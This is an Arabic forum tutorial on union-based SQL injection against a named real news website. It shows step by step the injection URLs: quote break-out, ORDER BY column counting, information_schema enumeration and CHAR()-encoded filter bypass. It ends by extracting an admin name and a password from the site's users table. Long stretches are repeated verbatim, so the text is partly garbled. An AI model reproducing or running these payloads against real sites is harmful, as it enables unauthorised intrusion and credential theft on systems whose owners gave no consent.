تخطي عدم ظهور الاعمدة في الحقن
اليوم معانا درس بسيط
ومفهوم ومهم
في بعض الاحيان يوقف الشخص عن العمل
لكن بعد اطلاعك على درس اليوم
لن تجد صعوبة باذن الله
مثلا معانا هذا الموقع
http://www.teaminsightmag.com/news.php?id=286 order by 15
لن تجد له خطأ
فعلينا اضافة
PHP:
بعد المتغير اي الرقم 286 علامة '
وبعد الرابط 23% وهى تعنى +--+ مشفرةالموقع الخاص اللي يشفر لنا الكلمات
http://www.waraxe.us/sql-char-encoder.html
شوفو النتيجة بدأت تظهر :surprised:
المهم الخطأ يختفي عند الرقم 11
والاستغلال يكون
http://www.teaminsightmag.com/news.php?id=286'+union+select+1,2,3,4,5,6,7,8,9,10,11#
ويصير هكذا لكن لم تظهر معانا الاعمدة ههههههههههه:gasp:
نضيف علامة - بعد علامة =
http://www.teaminsightmag.com/news.php?id=-286'+union+select+1,2,3,4,5,6,7,8,9,10,11%23
ظهرت معانا الاعمدة المصابة
ثم نضيف في العمود المصاب اي في مكان الرقم 3
group_concat(table_name)
و في اخر السطر
+from+information_schema.tables
وظهرت معانا
اقول ناخد واحد واحد ونضيفة بعد +from+ ونجرب
+from+
واذا لم تفلح فلابد عليك انك تشفر الكلمات
مثلا نأخذ كلمة
advertisers تشفيرها يكون =
CONCAT(CHAR(97),CHAR(100),CHAR(118),CHAR(101),CHAR(114),CHAR(116),CHAR(105),CHAR(115),CHAR(101),CHAR(114),CHAR(115))
وهذه نضعها في مكان الرقم 3
group_concat(table_name,0x3e,column_name)
وهذه في اخر الرابط
+from+information_schema.columns+where+table_name+like+
ونظيف لها الكلمة المشفرة
ويصير الرابط هكذا
http://www.teaminsightmag.com/news.php?id=-286%27+union+select+1,2,group_concat%28table_name,0x3e,column_name%29,4,5,6,7,8,9,10,11++from+information_schema.columns+where+table_name+like+CONCAT%28CHAR%2897%29,CHAR%28100%29,CHAR%28118%29,CHAR%28101%29,CHAR%28114%29,CHAR%28116%29,CHAR%28105%29,CHAR%28115%29,CHAR%28101%29,CHAR%28114%29,CHAR%28115%29%29%23
ظهر معانا
و في اخر السطر
+from+information_schema.tables
وظهرت معانا
advertisers
articles
comments
events
manager_navigation
news_headlines
settings
sites
survey_answers
sur
طب واحد يقلى انا هاعرف فين الجدول الى هاشتغل علية من كل دولarticles
comments
events
manager_navigation
news_headlines
settings
sites
survey_answers
sur
اقول ناخد واحد واحد ونضيفة بعد +from+ ونجرب
+from+
واذا لم تفلح فلابد عليك انك تشفر الكلمات
مثلا نأخذ كلمة
advertisers تشفيرها يكون =
CONCAT(CHAR(97),CHAR(100),CHAR(118),CHAR(101),CHAR(114),CHAR(116),CHAR(105),CHAR(115),CHAR(101),CHAR(114),CHAR(115))
وهذه نضعها في مكان الرقم 3
group_concat(table_name,0x3e,column_name)
وهذه في اخر الرابط
+from+information_schema.columns+where+table_name+like+
ونظيف لها الكلمة المشفرة
ويصير الرابط هكذا
http://www.teaminsightmag.com/news.php?id=-286%27+union+select+1,2,group_concat%28table_name,0x3e,column_name%29,4,5,6,7,8,9,10,11++from+information_schema.columns+where+table_name+like+CONCAT%28CHAR%2897%29,CHAR%28100%29,CHAR%28118%29,CHAR%28101%29,CHAR%28114%29,CHAR%28116%29,CHAR%28105%29,CHAR%28115%29,CHAR%28101%29,CHAR%28114%29,CHAR%28115%29%29%23
ظهر معانا
advertisers>id
advertisers>name
advertisers>url
advertisers>phone
advertisers>status
advertisers>site
advertisers>type
ونشوف كلمة name
ملاحظة دائما نعيد للوراء
ونضع كلمة name في مكان الرقم 3
و
+from+advertisers
في آخر الصفحة وتصير الصفحة
http://www.teaminsightmag.com/news....+1,2,name,4,5,6,7,8,9,10,11+from+advertisers#
ظهر معانا اسم الادمن ههههههههههههه نكمل ولا لالالالالالالالالالالا
نجرب الطريقة العادية فى الحقن ونظهر الباس
concat(column_name,0x3e,table_schema,0x3e,table_name)
+from+information_schema.columns+where+column_name +like+char(37, 112, 97, 115, 115, 37)%23
ظهر جدول مختلف
http://www.teaminsightmag.com/news....n_name +like+char(37, 112, 97, 115, 115, 37)#
نغير الجدول ونجرب ونشوف
http://www.teaminsightmag.com/news....ct+1,2,password,4,5,6,7,8,9,10,11+from+users#
الباس طلع وهو sdfasdasd
هههههه لا تنسى .... التقييم
advertisers>name
advertisers>url
advertisers>phone
advertisers>status
advertisers>site
advertisers>type
ونشوف كلمة name
ملاحظة دائما نعيد للوراء
ونضع كلمة name في مكان الرقم 3
و
+from+advertisers
في آخر الصفحة وتصير الصفحة
http://www.teaminsightmag.com/news....+1,2,name,4,5,6,7,8,9,10,11+from+advertisers#
ظهر معانا اسم الادمن ههههههههههههه نكمل ولا لالالالالالالالالالالا
نجرب الطريقة العادية فى الحقن ونظهر الباس
concat(column_name,0x3e,table_schema,0x3e,table_name)
+from+information_schema.columns+where+column_name +like+char(37, 112, 97, 115, 115, 37)%23
ظهر جدول مختلف
http://www.teaminsightmag.com/news....n_name +like+char(37, 112, 97, 115, 115, 37)#
نغير الجدول ونجرب ونشوف
http://www.teaminsightmag.com/news....ct+1,2,password,4,5,6,7,8,9,10,11+from+users#
الباس طلع وهو sdfasdasd
هههههه لا تنسى .... التقييم
اسم الموضوع : تخطي عدم ظهور الاعمدة في الحقن
|
المصدر : SQL قواعد البيانات
:bad: